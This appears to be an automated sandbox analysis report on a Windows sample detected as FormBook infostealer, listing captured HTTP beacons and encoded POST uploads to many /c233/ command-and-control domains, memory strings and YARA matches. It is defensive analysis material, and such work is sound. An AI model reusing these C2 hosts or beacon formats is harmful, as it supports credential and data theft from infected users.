00 00 00 00 00 00 Data Ascii: jDHtm=FKHEmDVNcOFb~ZcYEAEA8Ctn6as_c4NLUE8iUESuH4tAL7(fsvPJ6xGC0Zcubhdd~M~LKGF-CDM5IDPa5TiKZw4dHPrzYZPwTuhydQheDmtvXBUpK0MjOn2L09Fs0TipaEF9e1iawhPADM79e0~HA7r4RRc9R1cVuuA0vskNZLmjX838mrgUNIhDoMRgXHLlIeITAzwBmJYt2Mq0ViCS5PJpka3EIUHuaSJ14CPi4ZLBEy8tAx2p0AWNMvcBxcyNau7kh_dCLDsn1t4WO6rzZZcm(MBE0huRdq~8Y_jX6wttm_AZVEsiM2DfBQWWP4KaNlTkbmKCgkPo(p5Cie20Kzq_qleQhZiIUPrH9kP9KsgQCHywUxdSK5Vo1-k9itdN5F9FOutwPpoEFI8NTA).
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.ecoapiaryfarms.comConnection: closeContent-Length: 185415Cache-Control: no-cacheOrigin: http://www.ecoapiaryfarms.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ecoapiaryfarms.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 46 4b 48 45 6d 42 31 42 66 2d 49 64 36 72 49 5a 45 51 55 79 76 54 64 50 7e 59 6f 73 4d 66 67 36 5a 32 35 35 55 46 69 69 63 73 70 53 59 4c 76 66 71 74 6d 42 68 68 47 42 6a 70 63 74 52 78 5a 6c 69 4f 7e 44 4b 44 6c 45 43 44 45 34 43 6d 4c 62 34 44 6a 43 4c 41 45 68 4f 72 36 33 59 62 72 56 54 49 78 71 49 67 39 65 4f 32 46 70 4b 55 34 75 65 6c 41 38 51 6e 62 44 32 38 74 78 30 6a 4f 5f 61 6e 35 66 57 57 6d 59 68 69 54 4c 4e 6f 47 69 53 48 65 49 4f 4c 28 5f 65 32 30 55 66 33 34 52 6a 50 42 55 67 4a 63 4f 62 36 4f 39 53 38 48 30 69 61 31 69 65 6f 52 78 6f 4b 52 65 4e 43 4c 30 4d 66 55 68 4d 69 38 76 30 59 63 6a 7a 37 28 70 52 67 72 69 37 50 35 47 37 76 79 42 5a 58 43 75 4b 48 4e 66 32 43 6e 33 35 72 6a 46 4c 6e 51 5f 58 47 76 6b 37 6a 65 79 57 34 42 58 6a 4e 54 4f 55 4d 58 43 76 5f 63 73 4a 44 73 72 74 64 5a 6a 4b 4c 6a 34 65 59 74 45 32 76 68 78 31 77 44 52 61 6f 36 67 63 72 76 38 33 67 68 68 74 73 49 4c 66 47 41 54 64 45 66 5f 4f 77 57 5a 50 35 6d 52 4e 6c 54 53 62 6b 6a 6c 6d 56 4c 6f 7e 35 5a 52 76 66 32 34 49 7a 71 69 76 30 79 53 76 4b 32 59 55 50 6a 48 38 56 28 62 4b 64 6b 51 48 52 7e 7a 55 54 31 53 4c 70 56 6f 39 65 6c 71 79 5f 41 58 79 44 74 71 4f 38 67 33 62 5a 56 73 50 35 68 6f 41 54 5a 46 35 79 65 65 38 70 28 31 52 4c 69 39 34 78 4f 57 6f 31 72 4d 6a 38 37 52 70 5a 77 35 43 6a 34 39 61 53 39 75 65 31 59 55 38 51 52 69 49 6d 68 64 52 48 28 6f 49 5f 67 57 46 54 44 7a 70 74 6a 39 54 75 41 64 41 6d 28 72 55 78 36 37 54 58 44 62 49 58 42 7a 55 38 7e 57 7a 64 4f 69 73 43 43 4a 74 72 67 47 44 42 4e 63 46 76 67 34 30 51 57 65 69 42 39 32 67 66 48 35 79 79 48 77 68 4d 65 6a 4c 62 74 43 4b 61 4d 70 63 4a 54 79 45 57 71 54 4c 75 44 5f 4a 4f 4b 5a 7a 57 50 47 4c 56 75 49 50 66 30 64 64 4a 52 54 6f 53 35 53 4c 31 56 65 47 39 37 4f 4a 71 58 44 41 57 7a 6f 71 51 65 36 42 4d 37 78 36 70 51 71 38 38 49 4a 31 58 39 45 48 65 6b 62 6d 4e 48 72 4f 4e 62 61 36 5a 4c 59 55 31 4b 73 55 5a 70 30 46 6c 4a 33 76 53 77 71 58 4c 77 33 66 32 6f 34 56 58 43 4b 54 73 6f 41 32 53 68 4b 55 69 69 59 4c 36 46 38 4c 54 4e 79 74 70 73 36 41 79 77 61 41 4c 77 68 59 4b 73 35 63 6e 4f 57 45 34 55 78 77 77 4d 41 61 48 66 72 75 57 53 79 69 6e 79 7a 4b 54 6f 75 33 63 54 46 6a 66 48 33 78 45 7e 7a 37 37 75 75 7a 6e 33 54 53 74 57 31 38 7a 4e 5a 6b 36 69 74 66 5a 7a 57 58 61 51 62 46 58 4b 48 73 67 63 65 58 57 57 33 54 44 41 31 55 41 38 57 55 39 39 39 59 4b 71 2d 37 39 75 2d 53 70 48 53 44 68 4d 47 51 6b 55 68 4f 38 55 5f 71 4b 45 4d 37 6f 59 31 52 31 36 75 71 42 6d 6f 66 76 35 76 73 32 56 59 49 2d 41 6f 45 50 6d 72 36 37 35 62 69 70 59 39 37 43 45 42 75 55
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=dIUL4aEnqVztNkxGFBfGGDue4kuBNJsB41nCN9+lFBZzP9N/eKcd9EC4aoHiD0dIecD5 HTTP/1.1Host: www.lumenhealthandwellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?jDHtm=Vp47q3jWYtxCpR5shwdOI9jgrSmWH0DOE+Ng17hSC+D0xjvv9TnN74PiV/E2XVvfy3Xi&BZ=LhqLWrh8d HTTP/1.1Host: www.affilexample6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?jDHtm=rdruXmMsrmfjr75N4q96R5zwpwpkQvpMYoXExK0gOkKL6uUWfKzmipBUu891EQIUthqV&BZ=LhqLWrh8d HTTP/1.1Host: www.rupanaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=s9hIiY7EReOz2YwSLEQgOYezP1CImGsGkvwaaSfHWOStV9vruWPCpNUbWVdjWjx9llcz HTTP/1.1Host: www.henesymarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=P8W3Nhn/1wjuMbzQba9+Xkz0GoP3aEAwMmdFYv2f3Jxjf1tYZvWbX1Aq0R+IaCaFN+Nd HTTP/1.1Host: www.advincicode.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?jDHtm=clGH/XTlxIJgHxW4vaAZWA4KzODjpt9B0W6pMNoX4XRhNITn5jiOBWXD3dHeyDpJteiJ&BZ=LhqLWrh8d HTTP/1.1Host: www.glowtey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=NoL+4mltcJVtmaVUQntK+GB5xrEZLMxxCS0mBWv5U5hjZvn1kv6Rpm3ggpYoYEtVjIy6 HTTP/1.1Host: www.ecoapiaryfarms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.lumenhealthandwellness.com
          Source: unknownHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.affilexample6.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.affilexample6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.affilexample6.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 64 4c 30 42 30 51 72 78 57 63 45 7a 31 6d 6b 44 30 55 4e 56 51 59 37 7a 74 42 47 46 47 6e 72 77 64 71 49 78 78 4d 68 35 47 75 4c 6c 38 41 4b 5f 30 78 4b 6b 79 49 7a 69 48 70 41 6d 53 6d 36 4e 6a 53 72 62 55 32 58 44 53 59 6e 49 4b 71 64 5a 79 69 42 41 6e 47 72 45 36 74 55 45 59 30 4c 68 49 77 66 6a 33 45 68 4e 7e 56 51 36 32 56 35 32 53 65 56 4b 65 72 73 42 62 71 6c 49 38 54 31 75 68 42 70 64 4b 33 55 37 5a 30 65 53 67 5f 72 73 74 39 53 51 77 65 4b 4a 36 79 38 53 54 6d 47 41 39 34 6f 73 38 79 7e 4b 45 6c 4e 2d 79 78 48 61 4f 30 58 44 42 6d 6c 42 4d 64 43 70 7a 6a 42 4b 31 48 74 56 48 4c 44 41 4c 58 79 31 41 2d 77 74 4c 48 31 57 38 56 7a 65 42 45 67 72 6f 76 4d 5a 46 4e 31 61 59 42 78 4b 47 75 6e 46 6c 36 6b 6c 63 59 48 78 34 56 67 75 31 45 57 51 34 39 39 39 63 32 39 35 37 44 6c 38 6a 4f 64 76 71 69 6c 33 39 58 54 4d 77 6e 53 62 52 4d 68 74 74 78 54 55 4c 4b 6a 56 6d 76 50 54 68 7a 5a 43 47 32 49 79 79 73 5a 77 53 58 34 57 70 45 31 39 30 68 4f 57 6e 2d 6a 41 58 57 4f 62 58 50 69 45 6f 49 45 69 53 54 6a 75 67 47 78 37 6d 4b 66 73 68 4f 6e 53 51 77 66 4e 61 43 59 6c 28 62 68 62 4e 74 69 5f 41 30 79 67 37 76 59 59 38 58 28 4d 58 4d 47 5a 28 59 6d 63 54 71 33 6c 7a 47 4b 79 69 50 39 64 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHtm=dL0B0QrxWcEz1mkD0UNVQY7ztBGFGnrwdqIxxMh5GuLl8AK_0xKkyIziHpAmSm6NjSrbU2XDSYnIKqdZyiBAnGrE6tUEY0LhIwfj3EhN~VQ62V52SeVKersBbqlI8T1uhBpdK3U7Z0eSg_rst9SQweKJ6y8STmGA94os8y~KElN-yxHaO0XDBmlBMdCpzjBK1HtVHLDALXy1A-wtLH1W8VzeBEgrovMZFN1aYBxKGunFl6klcYHx4Vgu1EWQ4999c2957Dl8jOdvqil39XTMwnSbRMhttxTULKjVmvPThzZCG2IyysZwSX4WpE190hOWn-jAXWObXPiEoIEiSTjugGx7mKfshOnSQwfNaCYl(bhbNti_A0yg7vYY8X(MXMGZ(YmcTq3lzGKyiP9dAg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Sep 2020 07:32:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 06:52:18 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: model13.xml.0.drString found in binary or memory: http://gimp-print.sourceforge.net/xsd/gp.xsd-1.0
          Source: pagepanemaster.xml.0.drString found in binary or memory: http://mozilla.org/MPL/2.0/.
          Source: 111.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 111.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: pagepanemaster.xml.0.drString found in binary or memory: http://openoffice.org/2001/menu
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.advincicode.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.advincicode.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.advincicode.com/c233/www.glowtey.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.advincicode.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.affilexample6.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.affilexample6.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.affilexample6.com/c233/www.pro-ecare.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.affilexample6.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.climpuright.icu
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.climpuright.icu/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.climpuright.icu/c233/www.smartlivegt.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.climpuright.icuReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp, cmd.exe, 00000008.00000002.729627797.0000000003C09000.00000004.00000001.sdmpString found in binary or memory: http://www.ecoapiaryfarms.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp, cmd.exe, 00000008.00000002.729627797.0000000003C09000.00000004.00000001.sdmpString found in binary or memory: http://www.ecoapiaryfarms.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.ecoapiaryfarms.com/c233/www.profitableadvisors.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.ecoapiaryfarms.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: nswBDB9.tmp.0.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gamelosophers.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gamelosophers.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gamelosophers.com/c233/www.indiankhedu.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gamelosophers.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com/c233/www.ecoapiaryfarms.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gregorywise.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gregorywise.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gregorywise.com/c233/www.gamelosophers.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.gregorywise.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.henesymarte.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.henesymarte.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.henesymarte.com/c233/www.siyuechuanmei.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.henesymarte.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.indiankhedu.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.indiankhedu.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.indiankhedu.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.lumenhealthandwellness.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.lumenhealthandwellness.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.lumenhealthandwellness.com/c233/www.affilexample6.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.lumenhealthandwellness.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.pro-ecare.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.pro-ecare.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.pro-ecare.com/c233/www.rupanaa.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.pro-ecare.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.com/c233/www.the-mistershop.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.com/c233/www.henesymarte.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.com/c233/www.advincicode.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.com/c233/www.gregorywise.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.com/c233/www.climpuright.icu
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053CB

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
